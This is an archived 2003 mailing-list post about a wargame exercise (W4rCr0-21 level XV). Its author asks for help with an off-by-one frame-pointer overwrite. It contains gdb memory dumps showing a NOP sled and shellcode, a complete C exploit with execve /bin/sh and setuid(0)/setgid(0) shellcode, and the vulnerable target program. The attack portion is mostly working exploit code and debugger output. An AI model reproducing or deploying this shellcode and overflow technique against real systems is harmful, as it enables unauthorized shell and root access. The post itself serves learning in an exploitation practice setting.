Vulnerability Development mailing list archives
Fake frame overwriting
From: joe <moj0e () terra com br>
Date: Tue, 30 Sep 2003 20:21:13 -0300
Earlier I posted a problem I was having with executing code by overwriting EBP. I almost have it working... Its just one peculiar problem that I am dealing with.
Let me post the gdb output and you it might be clear to you. [joe@localhostpital wargame]$ gdb ./bof15 core.15254 GNU gdb 5.3-22mdk (Mandrake Linux) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you arewelcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details.This GDB was configured as "i586-mandrake-linux-gnu"...(no debugging symbols found)...
Core was generated by `./bof15 '. Program terminated with signal 4, Illegal instruction.Reading symbols from /lib/i686/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x40155f50 in sys_sigabbrev () from /lib/i686/libc.so.6 (gdb) break *0xbffff880 Breakpoint 1 at 0xbffff880 (gdb) x 0xbffff880 0xbffff880: 0x90909090 (gdb) run $VULN ######################## # W4rCr0-21 - LEVEL XV # ######################## - Yeah, right!!! (no debugging symbols found)... Breakpoint 1, 0xbffff880 in ?? () (gdb) x 0xbffff880 0xbffff880: 0x90909090 (gdb) x/100 0xbffff880 0xbffff880: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff890: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8d0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8e0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8f0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff900: 0x90909090 0x90909090 0x46b0c029 0x0cb3db29 0xbffff910: 0x890ceb80 0xeb80cdd9 0xc0295e18 0x89074688 0xbffff920: 0x76890c46 0x870bb008 0x084b8df3 0xcd0c538d 0xbffff930: 0xffe3e880 0x622fffff 0x732f6e69 0xfff88068 0xbffff940: 0xfff880bf 0xfff880bf 0xfff880bf 0x787878bf 0xbffff950: 0x78787878 0x4c007878 0x4b535345 0x2f3d5945 0xbffff960: 0x2f637465 0x73656c2e 0x434c0073 0x5041505f 0xbffff970: 0x703d5245 0x52425f74 0x5f434c00 0x52444441 0xbffff980: 0x3d535345 0x425f7470 0x434c0052 0x4e4f4d5f 0xbffff990: 0x52415445 0x74703d59 0x0052425f 0x54534f48 0xbffff9a0: 0x454d414e 0x636f6c3d 0x6f686c61 0x69707473 0xbffff9b0: 0x006c6174 0x4d524554 0x6574783d 0x53006d72 0xbffff9c0: 0x4c4c4548 0x69622f3d 0x61622f6e 0x48006873 0xbffff9d0: 0x53545349 0x3d455a49 0x30303031 0x414d5700 0xbffff9e0: 0x5f52454b 0x5f4e4942 0x454d414e 0x2d746c3d 0xbffff9f0: 0x6b616d77 0x4c007265 0x554e5f43 0x4952454d 0xbffffa00: 0x74703d43 0x0052425f 0x52455355 0x656f6a3d (gdb) c Continuing. Die: DW_TAG_formal_parameter (abbrev = 41, offset = 11608) has children: FALSE attributes: DW_AT_name (DW_FORM_string) string: "sym" DW_AT_decl_file (DW_FORM_data1) constant: 33 DW_AT_decl_line (DW_FORM_data2) constant: 365 DW_AT_type (DW_FORM_ref4) constant: 9043 Dwarf Error: Cannot find type of die. (gdb) c Continuing. sh-2.05b$ exit exit Program exited normally. (gdb)As you can see, It actually executes my shellcode (running sh-2.05b). However, It seems to die first.... When I run it out side of gdb, It causes an Illegal instruction.
Thanx for all your help! j0e
#include <stdio.h> #include <unistd.h> char sc_linux[] = ///home/joe/code/wargames/dome "\x29\xc0\xb0\x46\x29\xdb" "\xb3\x0c\x80\xeb\x0c\x89" "\xd9\xcd\x80\xeb\x18\x5e" "\x29\xc0\x88\x46\x07\x89" "\x46\x0c\x89\x76\x08\xb0" "\x0b\x87\xf3\x8d\x4b\x08" "\x8d\x53\x0c\xcd\x80\xe8" "\xe3\xff\xff\xff\x2f\x62" "\x69\x6e\x2f\x73\x68"; /* "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07" "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b" "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff" "\xff\xff\x01\x2f\x68\x6f\x6d\x65\x2f\x6a\x6f\x65" "\x2f\x63\x6f\x64\x65\x2f\x77\x61\x72\x67\x61\x6d" "\x65\x2f\x64\x6f\x6d\x65\x01"; */ // "\x31\xdb" /* xor %ebx,%ebx */ // "\x89\xd8" /* mov %ebx,%eax */ //"\xb0\x17" /* mov $0x17,%al */ // "\xcd\x80" /* int $0x80 */ /* setuid(0); */ // "\x31\xdb" /* xor %ebx,%ebx */ // "\x89\xd8" /* mov %ebx,%eax */ // "\xb0\x17" /* mov $0x17,%al */ // "\xcd\x80" /* int $0x80 */ /* setgid(0); */ // "\x31\xdb" /* xor %ebx,%ebx */ // "\x89\xd8" /* mov %ebx,%eax */ // "\xb0\x2e" /* mov $0x2e,%al */ // "\xcd\x80" /* int $0x80 */ /* /bin/sh execve(); */ // "\x31\xc0" /* xor %eax,%eax */ // "\x50" /* push %eax */ // "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ // "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ // "\x89\xe3" /* mov %esp,%ebx */ // "\x50" /* push %eax */ // "\x53" /* push %ebx */ // "\x89\xe1" /* mov %esp,%ecx */ // "\x31\xd2" /* xor %edx,%edx */ // "\xb0\x0b" /* mov $0xb,%al */ // "\xcd\x80" // "\x90\x90" /* int $0x80 */ // "\x90\x90"; /* exit(0); */ // "\x31\xdb" /* xor %ebx,%ebx */ //"\x89\xd8" /* mov %ebx,%eax */ // "\xb0\x01" /* mov $0x01,%al */ //"\xcd\x80"; /* int $0x80 */ /*Original shell code.... "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; */ main() { int i, j, t; char buffer[1024]; bzero(&buffer, 1024); for (i=0;i<=(252-sizeof(sc_linux)-20);i++) { buffer[i] = 0x90; } for (j=0,i=i;j<(sizeof(sc_linux)-1);i++,j++) { buffer[i] = sc_linux[j]; } for(t=0; t < 4;t++ ){ buffer[i++] = 0x80; //10 0x80498cc buffer[i++] = 0xf8; // Address of our buffer f6 buffer[i++] = 0xff; // ff buffer[i++] = 0xbf; //bf } for(t=0; t < 9; t++) { buffer[i++] = 0x78; // overflowchar } setenv("VULN",buffer,1); system("bash"); }
Attachment:
bof15
Description:
/* W4rCr0-21 - LEVEL XV coded by DownBload TIP: One byte to rule them all??? (deja-vu???:))) */ #include <stdio.h> void do_me (char *tralala) { char name[256]; int x; for (x=0;x<=256;x++) name[x] = tralala[x]; } main (int argc, char **argv) { system ("/usr/bin/clear"); printf ("########################\n"); printf ("# W4rCr0-21 - LEVEL XV #\n"); printf ("########################\n"); printf ("- Yeah, right!!!\n\n"); if (argc == 1) { printf ("> Are you a real hacker????\n"); exit(0); } do_me(argv[1]); printf ("> No, you are not a real hacker, you are hidiot :)))"); }
Current thread:
- Fake frame overwriting joe (Oct 01)
- <Possible follow-ups>
- Re: Fake frame overwriting joe (Oct 01)